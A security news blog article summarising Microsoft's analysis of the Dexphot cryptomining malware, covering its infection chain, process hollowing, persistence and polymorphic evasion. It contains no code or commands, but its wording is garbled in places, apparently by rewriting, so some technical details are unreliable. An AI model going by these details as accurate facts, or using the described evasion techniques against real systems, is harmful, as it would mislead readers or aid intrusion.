• About us
  • Disclaimer
  • Privacy Policy
Saturday, August 13, 2022
  • Login
  • Register
W-SE (Web - SEcurity)
  • Tech today
  • Security
    • Malware
    • Top list
  • Vulnerabilities
  • How To?
    • All
    • gaming
    • Smart phone
    • smart tv
    • software
    Tips for Buying the Perfect Travel Sim Card

    Tips for Buying the Perfect Travel Sim Card

    How to Write Farewell and Appreciate Messages

    How to Write Farewell and Appreciate Messages?

    Software help business

    Reasons to Buy the Right Business Hardware

    How to Invest in NFT Art?

    Ideal Internet Speed for Online Gaming

    Ideal Internet Speed for Online Gaming

    AceThinker Online Video Editor and Pro

    AceThinker Online Video Editor and Pro

    Trending Tags

    • Web Security
    • Data Security
    • Network Security
    • Cybersecurity
  • About us
  • Disclaimer
  • Privacy Policy
  • Contact
No Result
View All Result
  • Tech today
  • Security
    • Malware
    • Top list
  • Vulnerabilities
  • How To?
    • All
    • gaming
    • Smart phone
    • smart tv
    • software
    Tips for Buying the Perfect Travel Sim Card

    Tips for Buying the Perfect Travel Sim Card

    How to Write Farewell and Appreciate Messages

    How to Write Farewell and Appreciate Messages?

    Software help business

    Reasons to Buy the Right Business Hardware

    How to Invest in NFT Art?

    Ideal Internet Speed for Online Gaming

    Ideal Internet Speed for Online Gaming

    AceThinker Online Video Editor and Pro

    AceThinker Online Video Editor and Pro

    Trending Tags

    • Web Security
    • Data Security
    • Network Security
    • Cybersecurity
  • About us
  • Disclaimer
  • Privacy Policy
  • Contact
No Result
View All Result
W-SE (Web - SEcurity)
No Result
View All Result
Home Malware

Dexphot Malware uses Evade Detection Randomisation, Encryption and Polymorphism

Melina Richardson by Melina Richardson
in Malware, Microsoft
A A

Microsoft has been tracking malware for more than a year using numerous evasion techniques, including random file names, fileless install and polymorphism.

Microsoft which calls Dexphot malware has found that it has tried deploying files that have modified 2 or 3 times an hour. The polymorphic malware was targeted at thousands of devices and executed code directly in memory and hijacked valid application detection processes.

Large-scale efforts first fall over time and only a few computers now experience malicious activity relevant to Dexphot.

Dexphot infection begins with five hard drive files: a two-URL installer, a MSI file, a password-protected ZIP archive, a DLL archive loader extracted from the archive, and an encrypted data file containing three additional executables.

During execution, the malware uses numerous legitimate system processes, like msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe, early and later.

SoftwareBundler: Win32/ICLoader and its variants drop and execute the Dexphot installer. The installer then uses two URLs to collect malicious payloads (the same URLs will later be used to maintain and update and to re-infect).

A MSI package is downloaded from a URL and a silent installation uses msiexec.exe. A batch script in the Dexphot kit is first executed to search for antivirus items when the installation process begins.

The malware searches for Avast, AVG and Windows Defender Antivirus antivirus software, and prevents the infection, if an application is detected.

If not, the ZIP archive is decompressed in a password-protected format to extract the DLL loader, an encoded data file and the unrelated DLL.

Then process hollowing is used: the DLL loader targets and suspensions two legitimate system processes, then replaces their contents by two malicious executables, after which they can be released from suspension.

The configuration.exe process is then targeted and replaced by a third executable, a cryptocurrency miner.

The first two executables represent the Dexphot component monitoring services to ensure consistency. Each checks the status of all three malicious processes and begins reinfection if any is terminated. The monitoring services also check and immediately terminate cmd.exe processes.

The malware often creates programmed tasks as a fail-safe persistence. These tasks run malicious code using msiexec.exe as a proxy to update components.

There are several degrees of polymorphism, each package of MSI being unique because of the files included: the clean version of unzip.exe, a password-protected ZIP file and a batch script. The script is not always predefined, and for each package the names of other files and the ZIP file code change.

The content of the DLL loader is identical to the encrypted data in the ZIP file from one package to another.

The domains used in the attacks follow a similar pattern and randomly generate the name of the payload file. Many domains have long been used, but the MSI packages have often been changed or updated. Overall, about 200 unique Dexphot domains have been identified by Microsoft.

“Dexphot is not the kind of attack that mainstream media attention generates. It is one of numerous malware campaigns that are active at any given time. Dexphot illustrates the level of complexity and evolution of even daily threats, aimed at avoiding protection, and motivated to fly in the radar with a view to profit, “concludes Microsoft.

 

ShareTweetShare
Previous Post

Top 2019 Antivirus Applications For your Android Smartphone

Next Post

Introduction to the Tutu Software and its Safety Aspects

Melina Richardson

Melina Richardson

Melina Richardson is a Cyber Security Enthusiast, Security Blogger, Technical Editor, Certified Ethical Hacker, Author at Cybers Guards & w-se. Previously, he worked as a security news reporter.

Next Post
Security

Introduction to the Tutu Software and its Safety Aspects

Please login to join discussion

Free Online Tools

Article Rewriter Pro
Grammar Checker Pro
Plagiarism Checker
Online Ping Website Tool
Website Screenshot Generator
Website Source Code Finder

Free A To Z IT Tools Online

Free IT Tools Online
  • Trending
  • Comments
  • Latest
inurl technology

Latest Carding Dorks List for Sql Injection 2022

March 16, 2022
connect monitor to laptop two screens

How To Connect A Monitor To A Laptop And Use Both Screens?

February 10, 2021
how to connect two monitors to my laptop

How Do I Connect 2 Monitors To My Lenovo Laptop?

January 22, 2021
Gb Whatsapp An Unexpected Error

Gb Whatsapp An Unexpected Error

November 7, 2021
Windows Flaw

If Older Battleye software is used, Windows 10 1903 Blocked

0
Mac Os

New unpatched macOS bypass gatekeeper published online

0
Siemens Medical Products

Wormable Windows Flaw Affected Siemens Medical Products

0
Cloud Computing

5 Tips of the Personal Data Protection in the Cloud

0
Tips for Buying the Perfect Travel Sim Card

Tips for Buying the Perfect Travel Sim Card

August 5, 2022
How to Write Farewell and Appreciate Messages

How to Write Farewell and Appreciate Messages?

August 5, 2022
Cyber Security Degree In Pennsylvania

Ways Block Chain Affect Web Security in 2022

August 5, 2022

10 Tips on How to Improve your Software Development Skills

July 19, 2022

Quick Links

Learnopedia
Tech Write For US
Technology Write For US
Casino Write For Us
Mr.Perfect Reviews
Cyber Security Career

Recent News

Tips for Buying the Perfect Travel Sim Card

Tips for Buying the Perfect Travel Sim Card

August 5, 2022
How to Write Farewell and Appreciate Messages

How to Write Farewell and Appreciate Messages?

August 5, 2022
Cyber Security Degree In Pennsylvania

Ways Block Chain Affect Web Security in 2022

August 5, 2022

10 Tips on How to Improve your Software Development Skills

July 19, 2022
W-SE (Web – SEcurity)

W-SE regularly updates cyber attacks, hacking and events that provide IT security professionals with information throughout the world. Also offering news in W-SE. We spent two years living and sharing guidance and insights with IT experts, detailed analyzes and news.

We also train people with product reviews in different form of content.

Browse by Category

  • computer
  • Fraud & Identity
  • gaming
  • How To?
  • laptop
  • Malware
  • Microsoft
  • Mobile
  • photography
  • Privacy
  • Reviews
  • Security
  • Security Degree
  • Smart phone
  • smart tv
  • Social
  • software
  • Tech
  • Tech today
  • Top list
  • Uncategorized
  • Virus & Threats
  • Vulnerabilities
  • Website
  • What is?

Recent News

Tips for Buying the Perfect Travel Sim Card

Tips for Buying the Perfect Travel Sim Card

August 5, 2022
How to Write Farewell and Appreciate Messages

How to Write Farewell and Appreciate Messages?

August 5, 2022
  • About us
  • Contact
  • Disclaimer
  • Home
  • Privacy Policy
  • Resources
  • Support Forum
  • Tech Blog
  • Technology Write For Us
  • W-SE (Web Security)

© 2020 w-se.com - Powered by Fix Hacked Website, Cyber Special , SSL Authority Reviews Powered by Mr.Perfect Reviews.

No Result
View All Result
  • Tech today
  • Security
    • Malware
    • Top list
  • Vulnerabilities
  • How To?
  • About us
  • Disclaimer
  • Privacy Policy
  • Contact

© 2020 w-se.com - Powered by Fix Hacked Website, Cyber Special , SSL Authority Reviews Powered by Mr.Perfect Reviews.

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In